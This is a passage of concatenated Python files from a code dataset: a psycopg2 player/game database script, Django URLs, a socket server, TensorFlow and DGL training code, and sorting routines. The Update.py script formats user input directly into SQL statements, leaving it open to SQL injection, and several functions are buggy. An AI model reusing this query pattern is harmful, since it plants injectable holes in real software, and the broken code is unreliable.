'__main__':\n execute()\n \n","sub_path":"single_digit_representation/single_digit_representation.py","file_name":"single_digit_representation.py","file_ext":"py","file_size_in_byte":17247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"414799119","text":"#imports\n\nimport time\nimport random\nimport logging\nimport sys\n\nfrom argparse import ArgumentParser, RawTextHelpFormatter\n\n\nimport psycopg2\nfrom psycopg2.errors import SerializationFailure\n\n\n\n\n\n#NAME-ID\n#METHOD TO CREATE NEW USER IN DB\ndef create_new_user(conn, ID, NAME):\n\n with conn.cursor() as cur:\n cur.execute(\n \"INSERT INTO Players (ID, Name) VALUES ('%s', '%s')\" % (ID,NAME)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n#METHOD TO UPDATE USER IN DB\ndef update_user(conn, ID, NAME):\n with conn.cursor() as cur:\n cur.execute(\n \"UPDATE Players SET Name ='%s' WHERE ID='%s'\" % (NAME, ID)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n\n\n\n#TITLE-TAGS-DESCRIPTION-ID-HOST\n#METHOD TO CREATE NEW GAME IN DB\ndef create_new_Game(conn, ID, title, description, tags, host):\n with conn.cursor() as cur:\n cur.execute(\n \"INSERT INTO Games (ID, title, description, tags, host) VALUES ('%s', '%s', '%s', '%s', '%s')\" % (ID, title, description, tags, host)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n#METHOD TO UPDATE GAME IN DB\ndef update_Game(conn, ID, title, description, tags, host):\n with conn.cursor() as cur:\n cur.execute(\n \"UPDATE Games SET title='%s', description='%s', tags='%s', host='%s' WHERE ID='%s'\" % (title, description, tags, host, ID)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n\n\n\n\n#TITLE-TAG-HASSCORED-VALUE-ID\n#METHOD TO CREATE NEW TAG IN DB\ndef create_new_tag(conn, ID, title, tag, value, hasScored):\n value = int(value)\n with conn.cursor() as cur:\n cur.execute(\n \"INSERT INTO Tags (ID, title, tag, value, hasScored) VALUES ('%s', '%s', '%s', %d, '%s')\" % (ID, title, tag, value, hasScored)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n\n\n#METHOD TO UPDATE TAG IN DB\ndef update_tag(conn, ID, title, tag, value, hasScored):\n value = int(value)\n with conn.cursor() as cur:\n cur.execute(\n \"UPDATE Tags SET title='%s', tag='%s', value=%d, hasScored='%s' WHERE ID='%s'\" % (title, tag, value, hasScored, ID)\n )\n\n logging.debug(\"create_accounts(): status message: %s\", cur.statusmessage)\n conn.commit()\n\n\n\nif __name__ == \"__main__\":\n\n\n conn = psycopg2.connect(\n user='root',\n database='defaultdb',\n port=26257,\n host='localhost')\n\n\n#players table\n#runs when first arg=='Players'\n if (sys.argv[1]=='Players'):\n\n Param1=sys.argv[2]\n Param2=sys.argv[3]\n\n create_new_user(conn, Param1, Param2)\n\n#update players table\n#runs when first arg=='PlayersUpdate'\n if (sys.argv[1]=='PlayersUpdate'):\n\n Param1=sys.argv[2]\n Param2=sys.argv[3]\n Param3=sys.argv[4]\n\n update_user(conn, Param1, Param2, Param3)\n\n\n#tags table\n#runs when first arg=='Tags'\n if (sys.argv[1]=='Tags'):\n\n Param1=sys.argv[2]\n Param2=sys.argv[3]\n Param3=sys.argv[4]\n Param4=sys.argv[5]\n Param5=sys.argv[6]\n\n create_new_tag(conn, Param1, Param2, Param3, Param4, Param5)\n\n#update Tags table\n#runs when first arg=='TagsUpdate'\n if (sys.argv[1]=='TagsUpdate'):\n\n Param1=sys.argv[2]\n Param2=sys.argv[3]\n Param3=sys.argv[4]\n Param4=sys.argv[5]\n Param5=sys.argv[6]\n\n update_tag(conn, Param1, Param2, Param3, Param4, Param5)\n\n\n\n\n#game table\n#runs when first arg=='Game'\n if (sys.argv[1]=='Game'):\n\n Param1=sys.argv[2]\n Param2=sys.argv[3]\n Param3=sys.argv[4]\n Param4=sys.argv[5]\n Param5=sys.argv[6]\n\n create_new_Game(conn, Param1, Param2, Param3, Param4, Param5)\n\n#update games table\n#runs when first arg=='GameUpdate'\n if (sys.argv[1]=='GameUpdate'):\n\n Param1=sys.argv[2]\n Param2=sys.argv[3]\n Param3=sys.argv[4]\n Param4=sys.argv[5]\n Param5=sys.argv[6]\n\n update_Game(conn, Param1, Param2, Param3, Param4, Param5)\n","sub_path":"py scripts/Update.py","file_name":"Update.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"126820845","text":"# 🚨 Don't change the code below 👇\r\nage = input(\"What is your current age?\")\r\n# 🚨 Don't change the code above 👆\r\n\r\n#Write your code below this line 👇\r\n\r\nage_left = 90 - int(age)\r\n\r\nx = int(age_left) * 365\r\ny = int(age_left) * 52\r\nz = int(age_left) * 12\r\n\r\nprint(f\"You have {x} days, {y} weeks, and {z} months left.\")\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Day 2/your_life_in_a_week.py","file_name":"your_life_in_a_week.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"369142711","text":"from django.urls import path\nfrom . import views\n\napp_name = 'shows'\n\nurlpatterns = [\n # Main Shows app URLS\n\n # Shows Index\n path('', views.IndexView.as_view(), name='index'),\n\n # Individual Show Url\n path('/', views.DetailView.as_view(), name='show'),\n\n # Radio List Url\n path('all-radio', views.RadioView.as_view(), name='station'),\n\n # Individual Radio Url\n path('station//', views.StationView.as_view(), name='stations')\n\n]\n","sub_path":"shows/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"102154899","text":"stores = [\n {\"name\": \"first\", \"items\" : [{\"name\" : \"My item\", \"price\" : 19.99}]}\n , {\"name\": \"second\", \"items\": [{\"name\": \"My second item\",\"price\": 16.99}]}\n]\n\ndict_list = [\n {\"key\":\"value\", \"item\": [{\"two\":\"four\"}]}\n , {\"key2\":\"value2\", \"item2\": [{\"three\":\"five\"}]}\n]\n\nprint(dict_list[0][\"item\"])","sub_path":"old_session/section3_FlaskBasic/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"27168589","text":"# coding: utf-8\nimport sys\n\nsr = lambda: sys.stdin.readline().rstrip()\nir = lambda: int(sr())\nlr = lambda: list(map(int, sr().split()))\n\nN, M = lr()\nAB = [lr() for _ in range(M)]\nAB.sort(key=lambda x: [x[0], x[1]])\ncur = 0\nanswer = 0\nfor a, b in AB:\n if a >= cur:\n answer += 1\n cur = b\n if b < cur:\n cur = b\n\nprint(answer)\n","sub_path":"Python_codes/p03295/s094425832.py","file_name":"s094425832.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"143277989","text":"import socket\nimport sys\n\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = socket.gethostname()\nport = 9999\nserversocket.bind((host, port))\nserversocket.listen(5)\nclientsocket, addr = serversocket.accept()\nwhile True:\n print(\"连接���址: %s\" % str(addr))\n print(clientsocket.recv(1024))\n msg = input('sr:')\n clientsocket.send(msg.encode('utf-8'))","sub_path":"homework9/r03(3).py","file_name":"r03(3).py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"466847353","text":"#The correlation function f (star) g is integral of f(x)g(x+y). Through a similar\n#proof, one can show f(star) g=ift(dft(f)*conj(dft(g))). Write a routine to\n#take the correlation function of two arrays. Plot the correlation\n#function of a Gaussian with itself. \n\nfrom numpy.fft import fft,ifft\nimport numpy\nfrom matplotlib import pyplot as plt\n\ndef mycorr(x,y):\n assert(x.size==y.size) #if the vectors are different sizes, get grumpy\n xft=fft(x)\n yft=fft(y)\n yftconj=numpy.conj(yft)\n return numpy.real(ifft(xft*yftconj))\n\nif __name__=='__main__':\n x=numpy.arange(-20,20,0.1)\n sigma=2\n y=numpy.exp(-0.5*x**2/sigma**2)\n \n ycorr=mycorr(y,y)\n plt.plot(x,ycorr)\n plt.show()\n \n\n\n\n","sub_path":"tut2.py","file_name":"tut2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"524548431","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\n\r\ndef change_feature_x(feature):\r\n result = np.array([])\r\n flag = True\r\n for sample_index in range(feature.shape[2]):\r\n row = np.array([])\r\n for row_index in range(feature.shape[0]):\r\n if row_index == 0:\r\n row = feature[row_index, :, sample_index]\r\n else:\r\n row = np.hstack((row, feature[row_index, :, sample_index]))\r\n \r\n if flag:\r\n result = row\r\n flag = False\r\n else:\r\n result = np.vstack((result, row)) \r\n \r\n return result\r\n \r\n \r\ndef change_label_t(feature):\r\n result = np.zeros((feature.shape[0], 10))\r\n for i in range(feature.shape[0]):\r\n result[i, feature[i, 0]] = 1\r\n \r\n return result\r\n \r\n\r\nwith np.load(\"notMNIST.npz\") as data:\r\n images, labels = data[\"images\"], data[\"labels\"]\r\n\r\n\r\n#x_train_org = images[:, :, :15000]\r\n#x_train = change_feature_x(x_train_org)\r\nx_train = np.load(\"x_train.npy\")\r\n#t_train_org = labels[: 15000, :]\r\n#t_train = change_label_t(t_train_org)\r\nt_train = np.load(\"t_train.npy\")\r\n\r\n#x_validation_org = images[:, :, 15000: 16000]\r\n#x_validation = change_feature_x(x_validation_org)\r\nx_validation = np.load(\"x_validation.npy\")\r\n#t_validation_org = labels[15000: 16000, :]\r\n#t_validation = change_label_t(t_validation_org)\r\nt_validation = np.load(\"t_validation.npy\")\r\n\r\n#x_test_org = images[:, :, 16000:]\r\n#x_test = change_feature_x(x_test_org)\r\nx_test = np.load(\"x_test.npy\")\r\n#t_test_org = labels[16000: , :]\r\n#t_test = change_label_t(t_test_org)\r\nt_test = np.load(\"t_test.npy\")\r\n\r\nx = tf.placeholder(\"float\", shape=[None, 784])\r\ny_ = tf.placeholder(\"float\", shape=[None, 10])\r\n\r\nW = tf.Variable(tf.zeros([784,10]))\r\nb = tf.Variable(tf.zeros([10]))\r\n\r\nsess = tf.InteractiveSession()\r\nsess.run(tf.initialize_all_variables())\r\n\r\ny = tf.nn.softmax(tf.matmul(x,W) + b)\r\n\r\ncross_entropy = -tf.reduce_sum(y_*tf.log(y))\r\n\r\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)\r\n\r\nfor i in range(1000):\r\n #batch = mnist.train.next_batch(50)\r\n train_step.run(feed_dict={x: x_train, y_: t_train})\r\n\r\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\r\n\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\r\n\r\nprint (accuracy.eval(feed_dict={x: x_train, y_: t_train}))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ML/A2/t _00.py","file_name":"t _00.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34169657","text":"import math\n\nfrom calculator import Calculator\n\n\ndef test_calc_simple():\n calc = Calculator()\n assert(calc.operators['PLUSS'].execute(7, 3) == 10)\n assert(calc.operators['PLUSS'].execute(1, calc.operators['GANGE'].execute(2, 3)) == 7)\n\n\ndef test_eval_output_queue():\n calc = Calculator()\n calc.output_queue.push(1)\n calc.output_queue.push(2)\n calc.output_queue.push(3)\n calc.output_queue.push(calc.operators['GANGE'])\n calc.output_queue.push(calc.operators['PLUSS'])\n calc.output_queue.push(calc.functions['EXP'])\n assert(math.isclose(calc.evaluate_output_queue(), 1096.633158))\n\n\ndef test_eval_input_queue():\n calc = Calculator()\n calc.input_queue.push(calc.functions['EXP'])\n calc.input_queue.push('(')\n calc.input_queue.push(1)\n calc.input_queue.push(calc.operators['PLUSS'])\n calc.input_queue.push(2)\n calc.input_queue.push(calc.operators['GANGE'])\n calc.input_queue.push(3)\n calc.input_queue.push(')')\n\n calc.evaluate_input_queue()\n\n assert(calc.output_queue.pop() == 1)\n assert (calc.output_queue.pop() == 2)\n assert (calc.output_queue.pop() == 3)\n assert (calc.output_queue.pop() == calc.operators['GANGE'])\n assert (calc.output_queue.pop() == calc.operators['PLUSS'])\n assert (calc.output_queue.pop() == calc.functions['EXP'])\n\n calc2 = Calculator()\n calc2.input_queue.push(2)\n calc2.input_queue.push(calc2.operators['GANGE'])\n calc2.input_queue.push(3)\n calc2.input_queue.push(calc2.operators['PLUSS'])\n calc2.input_queue.push(1)\n\n calc2.evaluate_input_queue()\n\n assert(calc2.output_queue.pop() == 2)\n assert (calc2.output_queue.pop() == 3)\n assert (calc2.output_queue.pop() == calc2.operators['GANGE'])\n assert (calc2.output_queue.pop() == 1)\n assert (calc2.output_queue.pop() == calc2.operators['PLUSS'])\n\ndef test_parser():\n calc = Calculator()\n calc.parser(\"EXP(1 pluss 2 gange 3)\")\n\n\ndef test_calculator():\n calc = Calculator()\n txt = \"EXP(1 pluss 2 gange 3)\"\n assert(math.isclose(calc.calculate_expression(txt), 1096.633158))\n\n txt = \"((15 DELE (7 MINUS (1 PLUSS 1))) GANGE 3) MINUS (2 PLUSS (1 PLUSS 1))\"\n assert(math.isclose(calc.calculate_expression(txt), 5))\n\n\ndef test_calculator_custom():\n calc = Calculator()\n txt = \"EXP(SIN(2) PLUSS 10)\"\n y = calc.calculate_expression(txt)\n\n","sub_path":"tests/test_calculator.py","file_name":"test_calculator.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"116346905","text":"import itertools\nimport time\n\nimport dgl\nimport dgl.nn.pytorch as dglnn\nimport torch as th\nimport torch.multiprocessing as mp\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom dgl.nn import RelGraphConv\nfrom torch.utils.data import DataLoader\n\nfrom .. import utils\n\n\nclass EntityClassify(nn.Module):\n \"\"\"Entity classification class for RGCN\n Parameters\n ----------\n device : int\n Device to run the layer.\n num_nodes : int\n Number of nodes.\n h_dim : int\n Hidden dim size.\n out_dim : int\n Output dim size.\n num_rels : int\n Numer of relation types.\n num_bases : int\n Number of bases. If is none, use number of relations.\n num_hidden_layers : int\n Number of hidden RelGraphConv Layer\n dropout : float\n Dropout\n use_self_loop : bool\n Use self loop if True, default False.\n \"\"\"\n\n def __init__(\n self,\n device,\n num_nodes,\n h_dim,\n out_dim,\n num_rels,\n num_bases=None,\n num_hidden_layers=1,\n dropout=0,\n use_self_loop=False,\n layer_norm=False,\n ):\n super(EntityClassify, self).__init__()\n self.device = device\n self.num_nodes = num_nodes\n self.h_dim = h_dim\n self.out_dim = out_dim\n self.num_rels = num_rels\n self.num_bases = None if num_bases < 0 else num_bases\n self.num_hidden_layers = num_hidden_layers\n self.dropout = dropout\n self.use_self_loop = use_self_loop\n self.layer_norm = layer_norm\n\n self.layers = nn.ModuleList()\n # i2h\n self.layers.append(\n RelGraphConv(\n self.h_dim,\n self.h_dim,\n self.num_rels,\n \"basis\",\n self.num_bases,\n activation=F.relu,\n self_loop=self.use_self_loop,\n dropout=self.dropout,\n layer_norm=layer_norm,\n )\n )\n # h2h\n for idx in range(self.num_hidden_layers):\n self.layers.append(\n RelGraphConv(\n self.h_dim,\n self.h_dim,\n self.num_rels,\n \"basis\",\n self.num_bases,\n activation=F.relu,\n self_loop=self.use_self_loop,\n dropout=self.dropout,\n layer_norm=layer_norm,\n )\n )\n # h2o\n self.layers.append(\n RelGraphConv(\n self.h_dim,\n self.out_dim,\n self.num_rels,\n \"basis\",\n self.num_bases,\n activation=None,\n self_loop=self.use_self_loop,\n layer_norm=layer_norm,\n )\n )\n\n def forward(self, blocks, feats, norm=None):\n if blocks is None:\n # full graph training\n blocks = [self.g] * len(self.layers)\n h = feats\n for layer, block in zip(self.layers, blocks):\n block = block.to(self.device)\n h = layer(block, h, block.edata[\"etype\"], block.edata[\"norm\"])\n return h\n\n\nclass RelGraphEmbedLayer(nn.Module):\n r\"\"\"Embedding layer for featureless heterograph.\n Parameters\n ----------\n device : int\n Device to run the layer.\n num_nodes : int\n Number of nodes.\n node_tides : tensor\n Storing the node type id for each node starting from 0\n num_of_ntype : int\n Number of node types\n input_size : list of int\n A list of input feature size for each node type. If None, we then\n treat certain input feature as an one-hot encoding feature.\n embed_size : int\n Output embed size\n embed_name : str, optional\n Embed name\n \"\"\"\n\n def __init__(\n self,\n device,\n num_nodes,\n node_tids,\n num_of_ntype,\n input_size,\n embed_size,\n sparse_emb=False,\n embed_name=\"embed\",\n ):\n super(RelGraphEmbedLayer, self).__init__()\n self.device = device\n self.embed_size = embed_size\n self.embed_name = embed_name\n self.num_nodes = num_nodes\n self.sparse_emb = sparse_emb\n\n # create weight embeddings for each node for each relation\n self.embeds = nn.ParameterDict()\n self.num_of_ntype = num_of_ntype\n self.idmap = th.empty(num_nodes).long()\n\n for ntype in range(num_of_ntype):\n if input_size[ntype] is not None:\n input_emb_size = input_size[ntype].shape[1]\n embed = nn.Parameter(th.Tensor(input_emb_size, self.embed_size))\n nn.init.xavier_uniform_(embed)\n self.embeds[str(ntype)] = embed\n\n self.node_embeds = th.nn.Embedding(\n node_tids.shape[0], self.embed_size, sparse=self.sparse_emb\n )\n nn.init.uniform_(self.node_embeds.weight, -1.0, 1.0)\n\n def forward(self, node_ids, node_tids, type_ids, features):\n \"\"\"Forward computation\n Parameters\n ----------\n node_ids : tensor\n node ids to generate embedding for.\n node_tids : tensor\n node type ids\n features : list of features\n list of initial features for nodes belong to different node type.\n If None, the corresponding features is an one-hot encoding feature,\n else use the features directly as input feature and matmul a\n projection matrix.\n Returns\n -------\n tensor\n embeddings as the input of the next layer\n \"\"\"\n tsd_ids = node_ids.to(self.node_embeds.weight.device)\n embeds = th.empty(\n node_ids.shape[0], self.embed_size, device=self.device\n )\n for ntype in range(self.num_of_ntype):\n if features[ntype] is not None:\n loc = node_tids == ntype\n embeds[loc] = features[ntype][type_ids[loc]].to(\n self.device\n ) @ self.embeds[str(ntype)].to(self.device)\n else:\n loc = node_tids == ntype\n embeds[loc] = self.node_embeds(tsd_ids[loc]).to(self.device)\n\n return embeds\n\n\n@utils.benchmark(\"time\", 600)\n@utils.parametrize(\"data\", [\"am\", \"ogbn-mag\"])\ndef track_time(data):\n dataset = utils.process_data(data)\n device = utils.get_bench_device()\n\n if data == \"am\":\n batch_size = 64\n n_bases = 40\n l2norm = 5e-4\n elif data == \"ogbn-mag\":\n batch_size = 1024\n n_bases = 2\n l2norm = 0\n else:\n raise ValueError()\n\n fanouts = [25, 15]\n n_layers = 2\n n_hidden = 64\n dropout = 0.5\n use_self_loop = True\n lr = 0.01\n num_workers = 4\n iter_start = 3\n iter_count = 10\n\n hg = dataset[0]\n category = dataset.predict_category\n num_classes = dataset.num_classes\n train_mask = hg.nodes[category].data.pop(\"train_mask\")\n train_idx = th.nonzero(train_mask, as_tuple=False).squeeze()\n labels = hg.nodes[category].data.pop(\"labels\").to(device)\n num_of_ntype = len(hg.ntypes)\n num_rels = len(hg.canonical_etypes)\n\n node_feats = []\n for ntype in hg.ntypes:\n if len(hg.nodes[ntype].data) == 0 or \"feat\" not in hg.nodes[ntype].data:\n node_feats.append(None)\n else:\n feat = hg.nodes[ntype].data.pop(\"feat\")\n node_feats.append(feat.share_memory_())\n\n # get target category id\n category_id = len(hg.ntypes)\n for i, ntype in enumerate(hg.ntypes):\n if ntype == category:\n category_id = i\n g = dgl.to_homogeneous(hg)\n u, v, eid = g.all_edges(form=\"all\")\n\n # global norm\n _, inverse_index, count = th.unique(\n v, return_inverse=True, return_counts=True\n )\n degrees = count[inverse_index]\n norm = th.ones(eid.shape[0]) / degrees\n norm = norm.unsqueeze(1)\n g.edata[\"norm\"] = norm\n g.edata[\"etype\"] = g.edata[dgl.ETYPE]\n g.ndata[\"type_id\"] = g.ndata[dgl.NID]\n g.ndata[\"ntype\"] = g.ndata[dgl.NTYPE]\n\n node_ids = th.arange(g.num_nodes())\n # find out the target node ids\n node_tids = g.ndata[dgl.NTYPE]\n loc = node_tids == category_id\n target_nids = node_ids[loc]\n train_nids = target_nids[train_idx]\n\n g = g.formats(\"csc\")\n sampler = dgl.dataloading.MultiLayerNeighborSampler(fanouts)\n loader = dgl.dataloading.DataLoader(\n g,\n target_nids[train_idx],\n sampler,\n batch_size=batch_size,\n shuffle=True,\n drop_last=False,\n num_workers=num_workers,\n )\n\n # node features\n # None for one-hot feature, if not none, it should be the feature tensor.\n #\n embed_layer = RelGraphEmbedLayer(\n device,\n g.num_nodes(),\n node_tids,\n num_of_ntype,\n node_feats,\n n_hidden,\n sparse_emb=True,\n )\n\n # create model\n # all model params are in device.\n model = EntityClassify(\n device,\n g.num_nodes(),\n n_hidden,\n num_classes,\n num_rels,\n num_bases=n_bases,\n num_hidden_layers=n_layers - 2,\n dropout=dropout,\n use_self_loop=use_self_loop,\n layer_norm=False,\n )\n\n embed_layer = embed_layer.to(device)\n model = model.to(device)\n\n all_params = itertools.chain(\n model.parameters(), embed_layer.embeds.parameters()\n )\n optimizer = th.optim.Adam(all_params, lr=lr, weight_decay=l2norm)\n emb_optimizer = th.optim.SparseAdam(\n list(embed_layer.node_embeds.parameters()), lr=lr\n )\n\n print(\"start training...\")\n model.train()\n embed_layer.train()\n\n # Enable dataloader cpu affinitization for cpu devices (no effect on gpu)\n with loader.enable_cpu_affinity():\n for step, sample_data in enumerate(loader):\n input_nodes, output_nodes, blocks = sample_data\n feats = embed_layer(\n input_nodes,\n blocks[0].srcdata[\"ntype\"],\n blocks[0].srcdata[\"type_id\"],\n node_feats,\n )\n logits = model(blocks, feats)\n seed_idx = blocks[-1].dstdata[\"type_id\"]\n loss = F.cross_entropy(logits, labels[seed_idx])\n optimizer.zero_grad()\n emb_optimizer.zero_grad()\n\n loss.backward()\n optimizer.step()\n emb_optimizer.step()\n\n # start timer at before iter_start\n if step == iter_start - 1:\n t0 = time.time()\n elif (\n step == iter_count + iter_start - 1\n ): # time iter_count iterations\n break\n\n t1 = time.time()\n\n return (t1 - t0) / iter_count\n","sub_path":"benchmarks/benchmarks/model_speed/bench_rgcn_homogeneous_ns.py","file_name":"bench_rgcn_homogeneous_ns.py","file_ext":"py","file_size_in_byte":10773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"302244323","text":"class Module:\n def __init__(self, funk, names: list, perms: str, access: list, template: str, desc: str, cost: int):\n self.names = names\n self.funk = funk\n self.perms = perms\n self.access = access\n self.template = template\n self.desc = desc\n self.cost = cost\n\n\nclass Filter:\n def __init__(self, funk, name: str, desc: str):\n self.funk = funk\n self.name = name\n self.desc = desc\n","sub_path":"Module_struct.py","file_name":"Module_struct.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"490459937","text":"from flask import Flask, g\nimport sqlite3\nfrom flask import render_template\nfrom flask import request, session, url_for, redirect, abort, g, flash, _app_ctx_stack\n\n\n# -- leave these lines intact --\napp = Flask(__name__)\n\n\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n db_name = app.config.get('DATABASE', 'squawker.db')\n g.sqlite_db = sqlite3.connect(db_name)\n\n return g.sqlite_db\n\n\ndef init_db():\n with app.app_context():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Creates the database tables.\"\"\"\n init_db()\n print('Initialized the database.')\n\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, 'sqlite_db', None)\n if db is not None:\n db.close()\n# ------------------------------\n# @app.route('/')\n# def root():\n# conn = get_db()\n# #TODO change this\n# return \"Hello, post a new squawk!\"\n\n\n@app.route('/', methods=[\"POST\", \"GET\"])\ndef root():\n conn = get_db()\n c = conn.cursor()\n if request.method == 'POST':\n new_msg = request.form.get('msg')\n if len(new_msg) > 140:\n return \"Length error! Reduce length of squawk to 140 characters or less.\", 400\n else:\n query = \"INSERT INTO squawker (squawk) VALUES (?)\"\n c.execute(query, [new_msg])\n conn.commit()\n selectquery = \"SELECT squawk FROM squawker order by id DESC\"\n c.execute(selectquery)\n all = c.fetchall()\n c.close()\n return render_template(\"form.html\", squawks=all)\n# @app.route('/') #set default?\n# @app.route('/', method=[\"GET\",\"POST\"])\n#\n# def root(page):\n# return render_template('form.html')\n# @app.route('/hello')\n# def hello():\n# return 'Hello, World'\n# @app.route('/user/')\n# def show_user_profile(username):\n# # show the user profile for that user\n# return 'User %s' % username\n\n# @app.route('/post/')\n# def show_post(post_id):\n# # show the post with the given id, the id is an integer\n# return 'Post %d' % post_id\n\n\n# @app.route('/login', methods=['GET', 'POST'])\n# def login():\n# if request.method == 'POST':\n# do_the_login()\n# else:\n# show_the_login_form()\n\n\n# #@app.route('/hello/')\n# @app.route('/hello/')\n\n# def hello(name=None):\n# return render_template('hello.html', name=name)\n\n\n# with app.test_request_context('/hello', method='POST'):\n# # now you can do something with the request until the\n# # end of the with block, such as basic assertions:\n# assert request.path == '/hello'\n# assert request.method == 'POST'\n\n\n# # To record whatever is submitted via the form.\n# @app.route('/add_message', methods=['POST'])\n# def add_message():\n# \"\"\"Registers a new message for the user.\"\"\"\n# # if 'user_id' not in session:\n# # abort(401)\n# if request.form['text']:\n# db = get_db()\n# db.execute('''insert into message (text, pub_date) values (?, ?)''', (request.form['text'], int(time.time())))\n# db.commit()\n# flash('Your message was recorded')\n# return redirect(url_for('timeline'))\n\n\n# # To display everything that has been submitted by the form.\n# @app.route('/public')\n# def public_timeline():\n# \"\"\"Displays the latest messages of all users.\"\"\"\n# return render_template('timeline.html', messages=query_db('''\n# select message.* from message where order by message.pub_date desc limit ?''', [PER_PAGE]))\n\n# #Is this necessary? The previous function effectively does the work.\n# @app.route('/')\n# def timeline():\n# \"\"\"Shows a users timeline or if no user is logged in it will\n# redirect to the public timeline. This timeline shows the user's\n# messages as well as all the messages of followed users.\n# \"\"\"\n# return render_template('timeline.html', messages=query_db('''select message.* from message\n# where\n# order by message.pub_date desc limit ?''',\n# [PER_PAGE]))\n\n# if __name__ == '__main__':\n# app.run()\n","sub_path":"squawker/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"506249346","text":"import locale\nfrom decimal import Decimal\n\nfrom django import template\nregister = template.Library()\n\ndef warning(value):\n if value:\n return '' + value[0] + '' + value[1:]\n return value\n\n\ndef money_format(value):\n return format(value, '0,.2f')\n\ndef accounting(value, place=2):\n try:\n place = int(place)\n except:\n place = 2\n\n try:\n value = Decimal(value)\n locale.setlocale(locale.LC_ALL, '')\n return locale.format(\"%.*f\", (place, value), 1)\n except Exception as e:\n return value\n\nregister.filter('warning', warning)\nregister.filter('money_format', money_format)\nregister.filter('accounting', accounting)","sub_path":"oauth/templatetags/oauth_extras.py","file_name":"oauth_extras.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"237363630","text":"\ndef selection_sort(arr):\n\t#fiding the minimum number and place it in indexes of increasing orders.\n\tfor i in range(len(arr)):\n\t\tmin_num = a[i]\n\t\tposition = i\n\t\tfor j in range(i+1,len(arr)):\n\t\t\tif min_num > a[j]:\n\t\t\t\tmin_num = a[j]\n\t\t\t\tposition = j\n\t\tarr[position] = arr[i]\n\t\tarr[i] = min_num\n\treturn arr\n#time complexity = O(n^2)\n#auxiliary Space = O(1)\n\n\ndef bubble_srot(arr):\n\t#swap the indexes of elements in the array\n\tfor i in range(len(arr)):\n\t\tfor j in range(0, len(arr)-i-1):\n\t\t\tif arr[j] > arr[j+1]:\n\t\t\t\tarr[j], arr[j+1] = arr[j+1], arr[j]\n\treturn arr\n#time complexity = O(n^2)\n\n\ndef insertion_sort(arr):\n\t#loop throguh certain ranges of array and place elements in the right places of order.\n\tfor i in range(len(arr)):\n\t\tkey = arr[i]\n\t\tj = i - 1\n\t\twhile j >= 0 and key < arr[j]:\n\t\t\tarr[j+1] = arr[j]\n\t\t\tj -= 1\n\t\tarr[j+1] = key\n#time complexity = O(n^2)\n\ndef heapify(arr, n, i): \n largest = i # Initialize largest as root \n l = 2 * i + 1 # left = 2*i + 1 \n r = 2 * i + 2 # right = 2*i + 2 \n \n # See if left child of root exists and is \n # greater than root \n if l < n and arr[i] < arr[l]: \n largest = l \n \n # See if right child of root exists and is \n # greater than root \n if r < n and arr[largest] < arr[r]: \n largest = r \n \n # Change root, if needed \n if largest != i: \n arr[i],arr[largest] = arr[largest],arr[i] # swap \n \n # Heapify the root. \n heapify(arr, n, largest) \n \n# The main function to sort an array of given size \ndef heapSort(arr): \n n = len(arr) \n \n # Build a maxheap. \n for i in range(n, -1, -1): \n heapify(arr, n, i) \n \n # One by one extract elements \n for i in range(n-1, 0, -1): \n arr[i], arr[0] = arr[0], arr[i] # swap \n 